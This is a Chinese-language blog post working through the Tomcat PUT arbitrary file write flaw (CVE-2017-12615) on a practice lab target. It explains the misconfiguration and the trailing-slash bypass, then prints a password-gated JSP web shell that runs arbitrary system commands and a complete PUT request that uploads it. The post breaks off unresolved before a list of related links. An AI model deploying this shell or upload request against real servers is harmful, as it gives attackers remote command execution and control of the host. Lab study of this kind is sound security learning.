Tomcat PUT方法任意写文件漏洞学习

沐矢羽2025-09-16 9:33

1 PUT请求

PUT请求是一种在HTTP协议中常见的请求方法

1.1 基本原理

PUT请求是一种用于向指定资源位置上传新的实体数据的请求方法,与其他请求方法的区别在于,PUT请求用于创建或者更新只当资源位置的实体数据。它与GET请求不同,PUT请求会替换掉指定位置的原有数据,而不是简单的获取数据

1.2 使用场景

常见的使用场景包裹更新用户信息、上传文件、修改配置等,如使用PUT请求更新用户的个人信息,或者使用PUT请求上传文件到服务器。

1.3 基本语法和格式

http 复制代码 
PUT /api/users/123 HTTP/1.1
Host: example.com
Content-Type: application/json

{
  "name": "John",
  "age": 30
}
http 复制代码 
PUT /path/to/resource HTTP/1.1          ← 请求行  
Host: example.com                       ← 必须有 Host 头(HTTP/1.1)  
Content-Type: application/json          ← 实体头:描述消息体格式  
Content-Length: 123                     ← 实体头:消息体字节长度  
(可选) Authorization: Bearer <token>  
(可选) If-Match: "xyz"                   ← 并发控制  
(可选) Accept: application/json         ← 期望响应格式  

{                                       ← 消息体(Body):资源的完整新表述  
  "id": 123,  
  "name": "New Name",  
  "price": 29.99  
}

2 漏洞原理

Tomcat的web.xml配置(readonly=false),导致我们可以往服务器写文件

tomcat本身不允许上传jsp文件,但是1.jsp/加了就不是了,系统在保存时因为不能存在/字符,在保存时就会被忽略,此时jsp文件完成了上传并保存

3 漏洞复现

这里用的是好靶场的CVE-2017-12615

Apache Tomcat 7.0.0 至 7.0.79 版本且启用 HTTP PUT 方法(如将默认的 readonly 初始化参数设为 false )时,攻击者可通过精心构造的请求向服务器上传含恶意代码的 JSP 文件,一旦该文件被请求,其中代码将被服务器执行,造成数据泄露或服务器权限被获取等严重后果。

3.1 验证漏洞存在

开启本地代理,打开BP,启动拦截,刷新页面,抓到请求数据包

更改请求信息,根据响应可知,支持PUT请求方式

3.2 上传JSP文件

jsp 复制代码 
<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

这段代码的功能是:

  1. 检查请求参数"pwd"的值是否为"123",这里是可以进行更改的,类似于一个密码的作用
  2. 如果密码正确,执行请求参数"cmd"提供的系统命令
  3. 读取命令执行结果并输出到网页上

正常来说就没有这个400 Bad Request的,但是我这个不知道怎么回事

寻求ai后是这样的

jsp 复制代码 
PUT /shell1.jsp HTTP/1.1
Host: 8t4ptp9.haobachang.loveli.com.cn:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/plain
Content-Length: 419

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

但出现

相关推荐
技术人生黄勇几秒前
拆解 Hermes Agent:开源 Agent 里唯一的闭环学习系统
学习
凉、介18 分钟前
别再把 PCIe 的 inbound/outbound、iATU 和 eDMA 混为一谈
linux·笔记·学习·嵌入式·pcie
speop1 小时前
TASK01 | Reasoning Kindom
学习
2301_822703202 小时前
鸿蒙flutter三方库实战——教育与学习平台:Flutter Markdown
学习·算法·flutter·华为·harmonyos·鸿蒙
码喽7号2 小时前
vue学习四:Axios网络请求
前端·vue.js·学习
星幻元宇VR2 小时前
VR科普行走平台适用哪些科普教育主题
科技·学习·安全·vr·虚拟现实
xinzheng新政3 小时前
Javascript 深入学习基础·4
javascript·学习·servlet
charlie1145141913 小时前
通用GUI编程技术——图形渲染实战(二十九)——Direct2D架构与资源体系:GPU加速2D渲染入门
开发语言·c++·学习·架构·图形渲染·win32
CheerWWW3 小时前
C++学习笔记——线程、计时器、多维数组、排序
c++·笔记·学习
克里斯蒂亚诺·罗纳尔达3 小时前
智能体学习16——学习与适应(Learning-and-Adaptation)-深入解读
深度学习·学习·机器学习
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南04OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南07实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了08AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析09Oh My Codex 快速使用指南10开发者环境配置:用 Ollama 实现本地大模型部署(附下载慢的解决方案